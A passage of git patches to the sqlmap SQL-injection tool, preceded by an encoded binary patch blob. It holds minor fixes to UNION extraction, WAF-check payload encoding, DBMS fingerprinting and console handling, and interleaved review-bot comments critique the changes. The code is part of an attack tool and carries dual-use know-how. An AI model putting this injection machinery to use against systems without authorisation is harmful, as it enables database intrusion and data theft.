z!i`RqBPtR+N;=q%%(|Jxy4AHv&>EBG1Z=kG*P{R>08GN_e5*vJ*q_{RX-JIj1CKj5 z(D``zL?Esg&IAxgryrKXa0nJiCbLnL^hu4h9gR#fpm;e-gNJZWY|x%81p3ALU5Q56y0qwSh|#QIId1X zS*00MVC}_7jcfG9;N00ohY-9#=+f9aN8DX-mxQ+!s1%qI5!$D3g2yfeNc9{`Ub>)U z`!+aboED)dma@M;>}j{@iQ64z5CW1->FC(seiDkF8r`Ex*D0IsN4)VSkPM5nPLtXa zY7pfGg*GKEOTHqrmdfIp5G$Be%_lO14FkW1yqF8z8xQ%|QWH0%7)=8}NN&2FeXjcL z=)=85Sza}5Z zOlgVc;P(v|?5e;5nTJf3Q4A~g;p|p)CNq!=Ty5RlctfBmu=kT`Ye?Iq>GJEJX;+s^xD6M zTX+BH{3_Ugs|vO*1V@}~gJAPo0B5nf-dPb5Fy6Z=QXUAMB%zY|!I<5gZHFMn6Bb7K z-OkM??O$un)`%Sf_hua_;u#WFHcq(mc6qy+^7nMDBq~^gdI10ixXi8_34+S1T(?sl z$z{zOJgb>@beA}nIxH=0@7WTiu&8JHV48*B#~g9;g}mtJVy831hPS);*l8gPoB~}@ zgOKPNzLd2N4q_i(?)v4_s8MP<&s=g;o@cR_$k!@!p0>rV#Yj%-RMkQ{`|jEbQBtkf z_)^{wjaWCT@7<~BM(@s_+miLu#F}*1?X5-Wk(`!3_Y>N@=i}G4{g8H(vFsVb7#`3O z)0fTlEm0PvI&fl202LI75zqJW^28vu`2{r3ScI<=9ZEJ%IO(IkHYbkrUAIh@{@EC- zAO<$97V#L?Em!G;0k>NPl%=VPPI&+M;W8k!$g3el8`*o>~-Do^P|&h*d$4 zjcY}-mHB-#x8EU|hZQDYE%2dJWTLvq?_*@cF{s!LfsA0U&^JcthuYP_1tyd)AIBNV z19gQ}40=vccU>Recg7E1adHpF%yQ-siNO6$cFaAfaa~lvH=}(OS9;*y@yQVC2JXaN zeAXJeVjWVVk~{)sgx_)F4Vd4$t&a-A4H$<1JBZf!I{L@nEmgNT6!#6TYu zvUH46J6Bdu7Eyd&c+%<+P;v^yIX-~s&^xU_|2TMrZ&zjS^M9oB-uk%XxX^dRVj~-m zb8^?)Z2YkNF9_-&u=i2jy}+U4B=MnZyV+Jq8wBOE|uNjU^;M(M;16akrAO*38*br2^wZCYqb6P>c5uklU%*OnQv)iy1D+F`P zo;J-7sG4_M-eG2CqemZRp*vtxcUl<%*VwDX_J>!9oRcU@>k$^HBjP>mP8DkL*9GT5 zXR*z}Uezfv*i;ztN?BEdxHCXEGSwCS6i|W4tL&`VA zx;RdVNU{4pzO*v`A5J&-Me^yNK&>HBH8k(IzPF|gRB;U1>}PqsR*+vdb=AroS`6b^ zrQ#Y!WY62LlBjQu9}_|LvXu8&+BHs+SI@VVB82W#$u1IBjA$#X7_C2~!l-#>CI%?zl}fr( zfis<#3MwrMvVsLpR8&DUt<*FP0<+%s-WAL!8;KKZ*i)rF;$|?-NCkB78;QR5dgPok zKKA~>CJ@;o8I~-wiY=9yEea`jI_lwxNUpisLRf=SC~y$!2gi;9G+8AN^X$#LWfm8# zd@#nex&)+PJVx!UL=7d}ZVeYmUaC4Nmo_Vjy*If@aa$$kUiCphiwr;>K`Fs5YpF9)+ zoMxhs6Rj0=Z86&0dM8z45teZl1rg>`#*+E#_ zp&t-V2I1sbq9vt|?>*+MxpkO+tm6zfuu+Y};Oo%OoYJRnyl+aEdJa#etFWZ9K!9QoPxw(?50)OovpdB|%`nU>` zmlj>Y=C(Ci6A|CxcVaJo+)5~1Z z{2$@qj4;R4KEu+r7n@EjOJ#)gU5Eu|Q3QEmo6Sj5gOM4t*`y+H>&9eK9? 
z<>%wD?tupPP-#-?HHHc&C)+hm-GsH50@oU?&vO+KwU8HYOXm8?pysJ>sOjwJhk8j* z)OG8zPyKasjiRom0dc*hpOLG#(<7!84PcAV0Ue~!4UvG|qp_2`y@_2}k; z_2@|i;2{@gx&FT=)1yLnu+Ur-1x5H|xf;gF{bELDS|5}pBy>Mz+5mFQ%y&$(eu!zP z)g2~r+LRNKHs$JPFpV`~sc8{!%X<|7nLDU0sA{>0zb{^kYp5E2`97W#^k5^BR4H7m zrUaa4&!B&<=Y3^`&5mh_l^wY^Q)p>1@vk>;-pmFWYpCkQnUhi#b}fhrJv9!D7=b%s zZR{2n1TPuMi*tP`#fJ=h;wYpBzUZwTL&JQyeh?4CxL5YHGqh5#V1DX{4Cfp~jAds{zwYd?A^fO)KbVlvZt%(VBLr5CfGrBN#|)$j`8E6e}; z(o>NqU6)_~fekep;SF024!%G7RsF*AD$z8-G~?G&AWYj`X}((l92wyt4F=+u_$pj< Z`;sn;AmS(z)KC-tz5dVFKz~)b?%wq+L(c#J literal 4773 zcmV;W5?bvCob5$&3zI6APynS;tu}PQf@?uFAF6R$TMAQ@H9aKxbs(`lR$_Q^7V?!j z(^~=gf(zCT>3KN~p79R}W5u0Dj*hO!oeq^o>}J6Zw6$V2wX%AgwTc)z#o5%NE5=-m zy7TP<*#-{$_^> z#r)^5KmU^V+Jb{c>9u;zVu7e{F2dVu5U1ethCLoC7n6EgX>EO8q3))QJs8+fC~Ilv z+qiS*%V3?l>+$%33v>e=MsK5UV)%ZA(-*%sz7Id8LjVZi1eBftA4G+-M*wc`Xe_v1 z;Ok%VQP#PsVP5}m3@_v;@d|7Sly=kg26t*a7-^#_&Vg`rItc1-$Mtua$atE77g!9Q z^H*jG>C%(Z9~GaY%RYIC4=P=>lJvJ-w4aC*J*YgFr4Jj@)UW>79;)v0!)mI$JbEV^ z;dN?EM6zIhw5l)sA=PxcF&IrQe#-b){kY%&dK^4lSvjEYR-3}tEN&i*)W%uP7@NZ9 zsxP97a1Ngn<+@V7YoB9t`?!dAmk7;kzSWoa#31)F_&eNn9jI{SwbBhi&6+oCS1Nf z-+vwPpVTrPve5srrir+_%E9gG2}aTh3X5^>yY5*y+6djvj*RcRBxB47`wCs&9kY`P zLIT_t>Lrk#!=$$vq!68u-r+X{twiEC1g!*kJcTx0cq2<3faGmcWll9UMZFnfh5c=8 z6jQ`Js~@q4K%$H73vaT1utICAT8r%(sCskQICD4DmNO;6(UaAo{)(SgXbyaLU@Htu z6q2lJ?@;fXminzF5xy7zD#dXLj1%Tr!NJ(Q! 
z+8zsX^htc9%Xe%IEM!enSlqa27dUWaG>{nr0#UJ>sD>&emAFu?UWw0w3j<{*4?#sx zVw{i6%X{ZA<{E+w-@G#q{s$phNB;rdI}h%e2+82g_#CZ;hNh=$l-fwiV6K+U?iu%4 z2#eSP#t~aZoASPLz}Zk)3E6vGvF;YzF@T3RIcaP#+g;EW#Gio6OB7a-h!C=fHWYUY zs0f~hg*!v8Ccj^CH#JG&20MkoIi*YM6ok6FI1*@VK(!KD>%ks?T#>xnS-^ou022xg z%Y8C42|hbx#aK)0d{4oRhr}DRGH-G?>hOP+o-;I;@bBn-3itxeWf{^Ozi&>Ljv&*l z-9Oz1eBd(*3PC2*ovgFLWdK>5>g=I3!)6Ouu4hcSaMxUjvBO=yk3~NVaiy#uyx83^ zL*%~A0;>dz=Sk+mtSdR6mu{K`0XDpqkOzYo_`Zdkj3|ltBO)yeodm`LkR!1>dIOBu z?qk%f2XQXH#a(WTi#h{4#9W&7$0%;Qn-ZdwOS$O*OWVp?{HhGl1_PkZS&-v-`*RHA zuYd+POBD5EX^2s6h%#II^xHygMU(h9B6hRJZ(>xxSAa>0_>73_Qkoi16r{b~LjY*K zV8rUeNUu3pDO>jTCECyT6(uwO$3d|O&`kwmM~mmjJU2M>1(xczZ!#EcrfNTuIuj!sr>Uw+2+Un6_o)nV zrE@#y_!F|+xEKB^=`3m===&T-?%$H5fHDN3V85U!&4*v*qtvsY>F69=FApBFg3NNy zS&;xWglY&vH>GHK=|9U84TQdw@JF0=PW~g#ETDZ7LCPM&SZHCb4RvvE>n2Sh#+VvtuY=9UU(QCDMRaA3m5B$Jja86O^;20L2T0z0rkQ1E)2s5y#gySS zU32*NP5zR_TPr|@D2_v1>Sj-+6H~Mv!a&>DvSNV$Y{y)h^|P68G^W-%{FXAUcxuR6 z@Q0byd??OcVFzeM@nv{VK9Ekn#q{8E!@%CUTmF0#2x>ywPKW>*tFP@T}n>lzJ6t$`BjWw>mnpu z%z(WlD>FbKS6QD>($9`&TfWbflY@0CHO)LsH>f^p0s;<27#aK^!pj)b$$EtBw>}d5 zlH=#^QwI1YEo(orXwPuN*7n2j*aE{wUqyrr1q+vY4{g#Ay-SPKOxIjEPc3>3b~)Tav8P2{1mrd0TmyJ7|BB(8=M?;mAjcoh2xpwdp`FA2 zRe7J`@NRJk4%opSOovoQBg`I7ho2$O;CF}pWA5khR&n2|nyesxr_bT=46Z0*@881V zLSydX@IG;1;qW{`?-Fr`Mgy6{{bT-ohXh94!{I_>s$<^H;VE$>MI)7fghOm{*sv{dSL zgxbR>3`S^hb=w+RWp{^r1cklAb`bVNU9vEGCh~EwFmefY;gC~1Dq3&aS*RjzCWr@W z5T~rlb(2ViAiY#Hv#jwGX6+t2cY%~s9<|{o&`^-yc8E?vuT^xN4Hzfsf=ZOH;7B4C zepT(Cjy2T-E83igHB<~PsT}tBm8Y!3v#q(vbqlLNa3+Bf-7nM(x|F>i19TxZ^5AL; z=L30YKi_i?{{vCioP*5%7RV!Z&`v_4RM4Y+B5u;<=q`>t-z&tRoyc7K9hi$Rf7)N4 zpBU6$;}wL`<8XchdfNB{c?ts~mk>Mopd`LrSPk)<)1(QpO`JWdEJ5g$i_B!EIN)_V zr{Hl&Je3-(dt`6JB%zJNo>9ovquk2-rqY`4pGy!4*-IPI{cq)+nn@GtPCN7@fnfAo zAdXM{4X6RS8acEx&7lblK-dT=8O2YD0tWk45; zI6pe*yU63I^*dgTdfI$JFo#IwaFXl@bfGw1t-go_9A7u)#esbkgSfWXwi2@9>34_k zKL9+aKG|gQklZ+vv4>kgl9wJS$aMY%!r+O8KlMb=5#V|IU+a>^6!c*=Lap}?%3b5e zpi?-|O&m;^Y?@kM+PGH4EB4p#@X2m!4MHer%}K)U zAqn^@0z9;iB+{hFE^mrqO%pGJLpw=@?sbG8=l5-zdzQvsNX9)uU7%p?- 
zfbVfNfK!kfR&3ONn*0r_{Xf2m%-uJ9twzvRyQ3eUGfztqgj9xmVgS;=dcVD#<=P$I z%AsI^32)jdbmUve!Q_i0mzCjymE|CUNPg_e!i8Oi?|A+mZ?<6CF`xo{vZk#+$axZK zvgK37geA;0ba6S8Gv>2iNY1;3gy>aa#7o*TotY6yd;9*Q(Tuq^4OLFC+LzIuE zqkSugu0I(svlq&pFmTXXtAsQxUZBbOxy)Z;UA?wHH{Nm4oQ0m}y-|JLi9=TP&IL#03a z30liAFg%`ZRVKbgeG-S0<*)US(>0t^$BoP%^z3C#yT)7aIu{T`W&>i{kdwiyUs%52 z8%FeU7cgu_f6qR<&ofd1XF|h{1SNk+nhw_PXa4|P$7D` zW$<2r2t0Bj{t>qYW5jyl3v{bB3Zy8ctfYUFz$QM7_~koqnHfj)vRSTD}kGbr7_( z9s9CPei8mZyJIRO*qatI*|K#6*>Z*Xg0L+r9WJ$g5uLAB&B^A$%&6>(R(`dM_kp6w z2*w|3+25plwmdelGL9K}vxn>9nu(FBIg+=_K3+FL6w18OhS2u#VzMn+#C;K9sY(^f z+P%T3BMHOGrI(pQvG~%qKPG1~ib8)rMx z_wSlbsN9^6P5N;mEY_IzBsw%wE7!GTn# Date: Thu, 8 Mar 2018 17:44:15 +0100 Subject: [PATCH 055/428] Bug fix (UNION SQLi with --no-escape) --- lib/core/settings.py | 2 +- lib/techniques/union/use.py | 7 ++----- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 09f5243002f..5c5f4f0bb18 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.9" +VERSION = "1.2.3.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index baa42ddd7cd..6be9d4bbc48 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -44,6 +44,7 @@ from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException 
@@ -89,11 +90,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
 # Parse the returned page to get the exact UNION-based
 # SQL injection output
 def _(regex):
- return reduce(lambda x, y: x if x is not None else y, (\
- extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
- extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
- if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
- None)
+ return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None)
 # Automatically patching last char trimming cases
 if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index db964e74135..7d183aa846c 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-bcacc60d5d1a2769a667e787eb08b625 lib/core/settings.py
+3e4a8bea5a0f5b2f4e1fa0c0c5baf9ee lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
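Review bot: The rewritten `return reduce(...)` on the added line collapses what was a five-line, backslash-continued expression into a single line of roughly 330 characters, which is hard to review and hides the actual change (the exclusion of `HTTP_HEADER.URI` lines from the header text). Binding the filtered headers first keeps the intent visible, e.g. `headerLines = (header for header in headers.headers if not header.startswith(HTTP_HEADER.URI)) if headers else None` and then `listToStrValue(headerLines)` inside the second `extractRegexResult` call. The generator also reuses `_` as its loop variable inside a helper that is itself named `_`, which gives the name two meanings in three lines. `_oneShotUnionUse` begins and ends outside the hunk.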
@@ -97,7 +97,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py -6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py +ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py From 9ad32864ecb70d1838f9f0479b253d5b8facdf07 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:15:17 +0100 Subject: [PATCH 056/428] Fixes #2973 --- lib/core/settings.py | 2 +- thirdparty/colorama/winterm.py | 4 ++++ txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5c5f4f0bb18..d8e696cd3b5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.10" +VERSION = "1.2.3.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/colorama/winterm.py b/thirdparty/colorama/winterm.py index 60309d3c07a..b7c2404b74b 100644 --- a/thirdparty/colorama/winterm.py +++ b/thirdparty/colorama/winterm.py @@ -128,6 +128,8 @@ def erase_screen(self, mode=0, on_stderr=False): elif mode == 2: from_coord = win32.COORD(0, 0) cells_to_erase = cells_in_screen + else: + return # fill the entire screen with blanks win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) # now set the buffer's attributes accordingly 
@@ -153,6 +155,8 @@ def erase_line(self, mode=0, on_stderr=False): elif mode == 2: from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) cells_to_erase = csbi.dwSize.X + else: + return # fill the entire screen with blanks win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) # now set the buffer's attributes accordingly diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7d183aa846c..c29f549b3ed 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3e4a8bea5a0f5b2f4e1fa0c0c5baf9ee lib/core/settings.py +8cf22f36f6449f4cc5fea234a9a02cbe lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -333,7 +333,7 @@ bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py -c690e140157d0caac5824c73688231b3 thirdparty/colorama/winterm.py +cdd682cbf77137ef4253b77a95ed9bd8 thirdparty/colorama/winterm.py be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py 2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py From 24cefeaee2cdf121251e792a5214d4ea8a61d849 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:20:22 +0100 Subject: [PATCH 057/428] Minor notification update --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index d8e696cd3b5..b27ea17eae8 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.11"
+VERSION = "1.2.3.12"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index cab68f15e64..33a644c3270 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -125,9 +125,12 @@ def checkDbms(self):
 return True
 else:
- warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB
+ warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB
 logger.warn(warnMsg)
+ dbgMsg = "...or version is < 1.7.2" % DBMS.HSQLDB
+ logger.debug(dbgMsg)
+
 return False
 def getHostname(self):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c29f549b3ed..a69be5df920 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-8cf22f36f6449f4cc5fea234a9a02cbe lib/core/settings.py
+73907fd758301e42c53a71c82ca52bd2 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
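Review bot: The added `dbgMsg = "...or version is < 1.7.2" % DBMS.HSQLDB` applies `%` to a string that has no conversion specifier, so it raises `TypeError: not all arguments converted during string formatting` every time the non-HSQLDB branch runs, turning a warning path into a crash; drop the operand: `dbgMsg = "...or version is < 1.7.2"`. The later "Minor patch" commit on this page makes exactly that correction, so the intermediate version is broken. `checkDbms` begins outside the hunk.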
@@ -140,7 +140,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -b207e728934f768732852c1928c38483 plugins/dbms/hsqldb/fingerprint.py +bc8bc5d69cb720fb5dc23af490c7c11c plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py From 11b52c85e15e06a3104d25f12e509da093f501cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:46:37 +0100 Subject: [PATCH 058/428] Patch of bug introduced with 76905e8728a03b1fabd0514fd15a3ca9108e8fc2 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b27ea17eae8..a8cfa524428 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.12" +VERSION = "1.2.3.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1a176f19ae4..344a093d678 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -861,9 +861,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 skip = True
 if not skip:
- spaceplus = kb.postSpaceToPlus and place in (PLACE.POST, PLACE.CUSTOM_POST)
- value = urlencode(value, spaceplus=spaceplus)
- payload = urlencode(payload, safe='%', spaceplus=spaceplus)
+ if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path)
+ value = urlencode(value, spaceplus=kb.postSpaceToPlus)
+ payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)
 value = agent.replacePayload(value, payload)
 postUrlEncode = False
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index a69be5df920..79bfd5a0c87 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-73907fd758301e42c53a71c82ca52bd2 lib/core/settings.py
+d1c712d9027dab90b8aa46bf801d0f35 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
@@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py
 eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-f6a31eaa50907b724c25ead5a6fe7161 lib/request/connect.py
+9b31df4b00b1709948e7f0568d69d7de lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py
From 4cefff7e983854bf993fd54a9db1c807a168793d Mon Sep 17 00:00:00 2001
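Review bot: The rationale for the new `if place in (PLACE.POST, PLACE.CUSTOM_POST)` guard is parked as a trailing comment on a 140-character line; placing it above the `if` as `# URL-encode only POST data: encoding other places (e.g. the whole URI, path included) caused problems` reads better and survives reformatting. Note that the guard changes behaviour for every non-POST place, which previously still went through `urlencode()` with `spaceplus=False` and is now left untouched; if that is the intent, as the commit title suggests, a comment saying so saves the next reader a git-blame. `queryPage` begins and ends outside the hunk.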
From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:13:33 +0100 Subject: [PATCH 059/428] Bug fix (misencoding inside check waf payload) --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index ff238e9783c..96f8908e0de 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1333,7 +1333,7 @@ def checkWaf(): payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER - value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) pushValue(conf.timeout) conf.timeout = IDS_WAF_CHECK_TIMEOUT diff --git a/lib/core/settings.py b/lib/core/settings.py index a8cfa524428..72bbce430d9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.13" +VERSION = "1.2.3.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 79bfd5a0c87..6e21bf0e1c2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py +5132e59761d8bb617412d2aaaf987716 lib/controller/checks.py 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d1c712d9027dab90b8aa46bf801d0f35 lib/core/settings.py +b7e3ed2ba524c6b532fcc13025bd7dc3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From 5380e8174b93caede72123250ad9d6b676e5a60c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:20:33 +0100 Subject: [PATCH 060/428] Safer WAF heuristics in case of URI injections --- lib/controller/checks.py | 11 ++++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 96f8908e0de..26fcb4f3c11 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -1332,14 +1332,19 @@ def checkWaf():
 retVal = False
